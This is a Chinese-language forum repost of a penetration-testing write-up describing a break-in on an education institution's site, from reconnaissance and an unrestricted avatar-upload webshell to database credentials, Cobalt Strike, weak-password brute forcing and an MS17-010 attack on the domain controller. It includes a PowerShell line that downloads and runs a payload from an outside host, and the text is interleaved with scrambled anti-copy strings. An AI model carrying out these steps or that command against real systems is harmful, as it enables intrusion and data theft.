找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2119|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. Z. r) {$ p3 E) Y: y 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 / [. @. {% @' ]2 L

5 s% P5 ?$ x& d' |2 r1 W9 h

* d6 ~$ D% X. B# p  : H6 ?% F3 X1 Z8 n' E# P9 e, x4 _

/ X0 U/ \% P/ q

% `. b4 U. {# m/ C2 C- Y 正文7 m8 `6 N, x8 b, V( F! T+ U0 A' h. b

( N: y8 Q+ ^# f& x2 t+ B( O* F

1 j5 Z& u$ _/ x' Y/ P  7 j8 F3 r$ h. T8 [3 E) i

( A' T3 {8 g# F% E, y

' K. F' K5 g" b 目标:www.xxxx.com(一家教育机构)
, C7 | @' Y# h. S# s+ I
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
; A8 \/ o4 B0 U# D

3 Z* `+ b6 B6 @4 g- V3 W9 H4 U8 d

/ h; j" n! q, ^, A1 S9 R vshapes=6 B7 z' ~" Y/ I

& i5 E! f( V. m$ |

. \9 F3 ^; V# {! _# F4 x2 {' } 进行了简单的信息搜集
" A3 y9 Q2 [0 F8 Z$ j* m# {
7 f* w. G) a0 \! n9 J2 Q
d# w+ `* b. s2 A5 a/ x

+ x1 \( M' h7 _& W

2 _& d0 ?/ Z8 R' j- o5 R 子域名搜集: M9 m, G& j& ?( a

7 r7 G' S( V3 f2 U& v: z

6 F9 A8 g: t: ^; d" q" l vshapes= * V4 } N) I# {# O; v

y% c$ e0 j4 f0 x$ z$ P& a4 A

1 m( _) i9 K- T" `# g fofa找资产
/ r% r! Z Z" w9 ~! U% K: \9 T
0 k# {: B) [' l; @% b4 g: t, {
' u; o9 ~; R9 g/ p

2 v/ u5 Z" a# Y: n; E% G2 R! B6 c% Q

- o' P* q( o4 A' I- o- G) j( q* N- g vshapes= 0 Z1 ^' J% u- I3 i! E

/ S, [& W7 i/ V: |! H

; a5 U4 P6 y$ B 一共七个资产。去重之后只有两个。
5 U# w1 ^2 j" j8 U
" P: u2 g0 Q! ~5 H" p* n
2 \2 N) Q% V- E! T' V5 v6 j# Q/ F

' L* G! n7 f' e2 }3 Y

9 Y# z) {. d2 c$ ^ D/ M& L 目录探测/ E1 M! b, j' }3 x* U, c/ M

4 e. G" w9 [4 ~; a/ Z5 j

8 g1 N) G/ L5 R8 I vshapes= ; y3 O% d- @3 @) X: Y

' a' Y5 B9 V. ]; H- M w9 P

+ X# i8 H' s( x, Y. v& ^ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* w5 R) q& ^, h" }. L
0 Q8 U+ `# k4 F* z
+ q2 z; v' O8 l5 o1 l1 Y7 i

0 u5 l2 H4 p7 f: q- F

+ @3 O0 X- ~( f& {8 ^( M, M 我又尝试了通过修改返回包来绕过登录界面9 ~0 l, I( {; A6 X: B

\) k+ a$ u3 D; Z4 E

& b, e4 A1 e# z9 Q2 d8 Z) t' m& U+ V/ u vshapes=8 p3 Z- R/ @! ]. R% _# Q2 N4 J

' K0 t* t3 L3 E

: k4 ?# A* s" Z* z! S8 @ 还是不行,尝试注入无果 w$ _( ^2 S" Y9 k0 r

- v4 d; e% s8 L- _1 w/ A$ a9 ?) L

. v( Z0 o R \6 l- H( V$ |' I vshapes= . `, a! F- F1 d5 Y; R3 I o0 d

7 d/ W: [" i# Q& c4 M% \

! _) y( R7 U: Y' |4 i 不过我目录探测出了一处Spring信息泄露
3 J, A) d$ _! x+ U- X
- `* ?% l/ S8 X8 W
2 r; U5 J2 K0 _6 @1 g5 ^8 H4 u

# |- {0 {" j8 ^4 j& Z; P* D# Z1 h" T

+ y$ t4 ~' k) o3 R vshapes=0 ?$ F& U% C: a

$ M) N B* B; \" ?

6 l: }6 ^" a$ H% h$ ~8 _. T 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 4 \* T4 y. u- o+ g' Z, [: C

. ~! f: y5 g6 }7 W

/ {( n9 f! w1 {' Q vshapes= & t F9 K p2 z- q

e+ p% |5 ?7 ~( V2 l" U7 q

# }& L, d9 l5 q* n; {1 C7 Q6 y9 Z0 l 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。2 I& H/ i% s" j" b3 o" j& P

3 N- j; y* g8 I9 y' g' F2 a$ A

. x# B1 W1 W+ V* \0 ^# m5 b vshapes= * c6 J% t/ \5 O# N

4 i9 t, Y/ K' H1 y

C* q/ P3 y& b, l6 K% ]& j 获取有些师傅到这一步就手机抓包电脑测了。1 |; i7 V2 l$ L# _: ~+ T

! R) |( R2 Q$ w" [- H

) Z6 r! o9 p u Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。; p) N# ` F, v! O* |( g

- W5 E9 N, g9 @& A( m9 q: Z) M' X4 V0 I

! Q( s7 R. X* m 其中在一个公众号发现了小程序,可以进行注册。 5 @ C* a5 j5 _: g5 w! b

& K" H7 a L/ H8 F

6 o3 G% B4 M3 _0 N. m 看到了头像上传,尝试上传获取WebShell - t& L0 `8 i( g

! B/ \4 p; D ^& \% n0 r: G# P" f

, d% l& F% ~4 s- ~ vshapes= % f1 F2 ~+ Z) u; p5 y- F U/ D

r; S% E( M' w/ a

. W4 A+ F& l; | 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 # P. V- |) Y% O5 Q: f; V. G7 c/ B8 j

8 Y0 e* j6 v! G9 T

/ P# q3 n: n) a. w vshapes= 4 i0 J) Y3 C( e t7 q

2 C! E( [3 M7 L8 V

, S0 m, C5 N! J/ r+ `; V 然后上了大马 * {& n& z, i# c2 `2 i

) t, r. `1 }$ Q3 D! Q+ [3 u+ h

5 Y* V, i( v" N x# c" P" n2 O ^ vshapes= # k6 i% {3 d7 r" ~

4 m* \5 y4 O k. r

, K8 g& Z* O, X0 S( ~ vshapes= 1 f- Q' Y" z4 T) ?/ U! u7 i

* `% P }# f/ B$ U; X! S

8 E" ?: S+ C7 b& D" t3 z0 T, M 通过翻找文件发现数据库账号密码 ! l ^. p' |. f6 a# W

& ]6 {2 T3 L7 C) o) Y4 _

2 W8 t6 f) Q+ T vshapes= 1 b& C/ E9 I! `8 P

. ~5 ^" k9 T6 \6 ?/ E" Z1 m8 `

* R. r4 i# R' Q' M: k7 P --内网渗透 + Y$ ^. p* _$ }; @

5 n5 y) g1 a1 z2 r0 \# L

6 U3 w& P; R, F( b! `0 U 直接通过powershell执行 cs上线 ( e0 q: C' F) |. F

" e6 E9 Q$ K* `# N0 j5 n0 F' x

8 t5 m+ B' K1 K( z8 P4 l powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" # |% B9 f- @. V* _' [& g6 m

: n3 C0 {, r1 H9 ~( t

1 Y! G+ w: H1 F- U6 S5 P vshapes=3 b5 V; t# t+ @$ f" W' P" G

2 U' p9 ~+ W5 m1 l. n; I' {$ f

9 [. _- C4 `, l; c( C 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 0 K/ A3 \, J& g2 E

; j' K0 W# X7 a- z- \, n

* S9 _" q: Y& l vshapes=- z) B$ p5 G F

7 h9 \4 ?7 P1 H- g: G6 f

7 W# Y8 A1 [4 X. C4 X2 |, U4 t 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
; Q$ x* `; z, C& J* {0 I) j
8 ?# R A: \; s" W! E- Z
8 ?# ~( l' P( x" q# V: h7 v5 {1 `
# U( x+ z: y% o. T

: @" {$ K4 d# |2 K9 ?

& b c8 u o5 b4 x% M+ f vshapes=7 y4 j( J! P# p! | a

( T1 h1 n! A1 a( U9 l$ a

5 D$ f' ?: G. I# o! {0 i" d% k 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
0 ]4 U1 j) N4 r1 `3 L5 L$ Z9 N
# [4 |- ` V6 U# Z! G
3 M6 W( r5 f( K" ]( G

" d7 d7 Y K. F- e- q5 q" A

2 Y6 y0 a" U( F0 \ vshapes= - N" p) Q5 b+ G( m8 a+ @

) H8 a$ w8 ]1 o- j$ i% g' P9 x5 E

: b) l5 v3 C! u$ J9 |' P' @2 U1 Z
S! f' S8 ~! a6 L
( Z- k2 O* D1 l- R, Z$ \
; d; Z) N) G! B* M! Y- F$ Z

, V; `( R7 J, K

% X* Y9 B; L. Z) h. i; h* s   - }6 \) ^! p1 X+ W+ a5 e' c

) V1 \2 R2 [ @

) M' C& o9 ?/ i- H! Q" \. f' q- |, } 小结$ c0 f( q* @7 N z/ g

6 u5 Y2 C( C8 s/ a: w

2 s+ f R" u, z# T# n4 n   3 z* E: _* J6 ?( N0 \' D: i

6 m; ^. L! k* s8 H1 p

0 M3 R5 q: G" `" H+ r# J. N 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!! T8 w" E% ], @. l# D/ b

$ _* S2 H6 N0 f+ r- Y) l0 m. J6 |

. t1 f* |% A. Z4 |, o3 y) i* A  , U: d3 ^5 l# g/ `- T/ g7 z/ ~0 A

% Z O! \$ T+ S+ y8 g
    $ r( w) ?. b: C: C; F- n
  • $ o( K* L* X' E v( v9 [   A7 v+ G' z+ g# U1 E* r& q
  • 4 s/ a0 I' h! o1 h" ~
  • ' f. i( n" S' w6 m9 M  + \! |8 [% U7 B; b) ^& L
  • 5 q, T" p k; p# L, x
* v$ t+ N# n1 F3 Y3 z& X

2 h0 y4 D* J4 ]- u, ~- G 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html ! m' m) x e* R; {5 b- d2 P1 e% X9 H* s; S

- u, I% N+ k% L" ]+ k

4 u) { ?; n3 u x' N1 j9 L0 y   R. e' R% U& F, |* Y- L4 J

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表